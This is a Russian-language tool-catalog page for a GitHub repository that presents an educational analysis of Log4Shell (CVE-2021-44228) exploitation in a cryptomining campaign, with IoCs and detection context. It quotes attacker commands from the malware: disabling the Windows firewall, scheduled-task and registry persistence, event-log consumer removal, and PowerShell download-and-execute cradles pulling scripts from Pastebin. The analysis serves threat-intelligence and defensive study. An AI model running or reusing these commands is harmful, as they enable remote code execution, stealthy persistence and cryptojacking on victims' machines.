Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Log4j-Vulnerability — # Образовательный анализ уязвимости Log4Shell (CVE-2021-44228) Подробный разбор уязвимости Log4Shell (CVE-2021-44228), описывающий её эксплуатацию в кампании по майнингу криптовалюты с указанием индикаторов компрометации (IoCs), сопоставлением с MITRE ATT&CK и рекомендациями по обнаружению. | Kitploit
Инструменты/GitHubGitHub/demining/log4j-vulnerability
Управление индикаторами компрометации (IOC)Анализ уязвимостейЭксплуатацияАнализ вредоносных программРазведка угрозОбучение и Образование
GitHubdemining/log4j-vulnerability

Log4j-Vulnerability

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
Сайт
62543 лет назадЕщё не проверено

Описание

# Образовательный анализ уязвимости Log4Shell (CVE-2021-44228) Подробный разбор уязвимости Log4Shell (CVE-2021-44228), описывающий её эксплуатацию в кампании по майнингу криптовалюты с указанием индикаторов компрометации (IoCs), сопоставлением с MITRE ATT&CK и рекомендациями по обнаружению.

Поделиться

Уязвимость Log4j



Эксплойт в коде майнинга криптовалюты, использующий опасную уязвимость Log4j
  • Туториал: https://youtu.be/PNDBjoT83zA
  • Туториал: https://cryptodeeptech.ru/log4j-vulnerability


Предыстория Log4j

Команда Alibaba Cloud Security публично раскрыла критическую уязвимость (CVE-2021-44228), позволяющую неаутентифицированное удалённое выполнение кода в нескольких версиях Apache Log4j2 (Log4Shell). Атакующие могут эксплуатировать уязвимые серверы, подключаясь по любому протоколу, например HTTPS, и отправляя специально сформированную строку.

Кампания криптомайнинга с использованием Log4j

Darktrace обнаружила криптомайнинг у нескольких клиентов, возникший в результате эксплуатации этой уязвимости Log4j. В каждом из этих инцидентов эксплуатация происходила через исходящие SSL-соединения, которые, как представляется, являются запросами на получение base64-кодированных PowerShell-скриптов для обхода периметровой защиты и загрузки пакетных (.bat) файлов, а также нескольких исполняемых файлов, устанавливающих вредоносное ПО для криптомайнинга. Эта активность имела более широкие индикаторы кампании, включая общие прописанные в коде IP-адреса, исполняемые файлы и скрипты.

Цикл атаки начинается с, по-видимому, оппортунистического сканирования устройств, подключённых к интернету, в поисках серверов VMWare Horizons, уязвимых к эксплойту Log4j. После обнаружения уязвимого сервера атакующий устанавливает HTTP- и SSL-соединения с жертвой. После успешной эксплуатации сервер выполняет обратный вызов на порт 1389, получая скрипт с именем mad_micky.bat. Это позволяет достичь следующего:

  • Отключает брандмауэр Windows, устанавливая для всех профилей состояние=off
    ‘netsh advfirewall set allprofiles state off’
  • Ищет существующие процессы, указывающие на другие установки майнеров, с помощью ‘netstat -ano | findstr TCP’, чтобы выявить любой процесс, работающий на портах :3333, :4444, :5555, :7777, :9000, и останавливает выполняющиеся процессы
  • Запускается новый веб-клиент для незаметной загрузки wxm.exe
  • Планировщик задач используется для обеспечения персистентности. Команда ‘schtasks /create /F /sc minute /mo 1 /tn –‘ планирует задачу и подавляет предупреждения; задача должна быть запланирована в течение минуты после выполнения команды и получает имя ‘BrowserUpdate’, указывающее на вредоносный домен ‘b.oracleservice[.]top’ и прописанные в коде IP-адреса: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080
  • В реестр добавляются ключи RunOnce для обеспечения персистентности: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d

По крайней мере в двух случаях скрипт mad_micky.bat был получен через HTTP-соединение, в котором использовался user-agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). Это был первый и единственный раз, когда этот user-agent наблюдался в этих сетях. Похоже, что этот user-agent легитимно используется некоторыми устройствами ASUS после заводской установки; однако, поскольку это новый user-agent, наблюдавшийся только во время этой активности, он вызывает подозрения.

После успешной эксплуатации сервер выполняет обратный вызов на порт 1389 для получения файлов скриптов. В этом примере /xms.ps1 — это base-64 кодированный PowerShell-скрипт, который обходит политику выполнения на хосте, чтобы вызвать ‘mad_micky.bat’:

Эксплойт в коде майнинга криптовалюты, использующий опасную уязвимость Log4j

Рисунок 1: Дополнительные сведения о PowerShell-скрипте xms.ps1

Снимок детализирует журнал событий затронутого сервера и указывает на успешное выполнение кода Log4j RCE, которое привело к загрузке файла mad_micky.bat:

Эксплойт в коде майнинга криптовалюты, использующий опасную уязвимость Log4j

Рисунок 2: Данные журнала с выделением файла mad_micky.bat

Были инициированы дополнительные соединения для получения исполняемых файлов и скриптов. Скрипты содержали два IP-адреса, расположенных в Корее и Украине. Было установлено соединение с украинским IP-адресом для загрузки исполняемого файла xm.exe, который активирует майнер. Майнер XMRig (в данном случае) — это открытый кроссплатформенный инструмент для майнинга, доступный для загрузки из множества публичных источников. Следующей загруженной exe-программой был ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).

Эксплойт в коде майнинга криптовалюты, использующий опасную уязвимость Log4j

Рисунок 3: Дополнительные сведения об исполняемом файле XMRig

Соединение с корейским IP-адресом включало запрос ещё одного скрипта (/2.ps1), а также исполняемого файла (LogBack.exe). Этот скрипт удаляет выполняющиеся задачи, связанные с журналированием, включая фильтр журнала событий SCM или подписчика журнала событий PowerShell. Скрипт также запрашивает файл с Pastebin, который, возможно, является конфигурационным файлом бекдора Cobalt Strike. Удаления журналов выполнялись через планировщик задач и WMI, включая: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.

  • Конфигурационный файл (больше не размещён): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)

Второй файл, запрошенный с Pastebin, хотя он больше не размещён на Pastebin, является частью команды schtasks и, вероятно, используется для обеспечения персистентности:

  • schtasks /create /sc MINUTE /mo 5 /tn  “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'”  /F /ru System

Исполняемый файл Logback.exe — это ещё один инструмент майнинга XMRig. С того же корейского IP-адреса был также загружен файл config.json. После этого для настройки майнера использовались команды cmd.exe и wmic.

За этими загрузками файлов и настройкой майнера последовали дополнительные соединения с Pastebin.

Скачать инструмент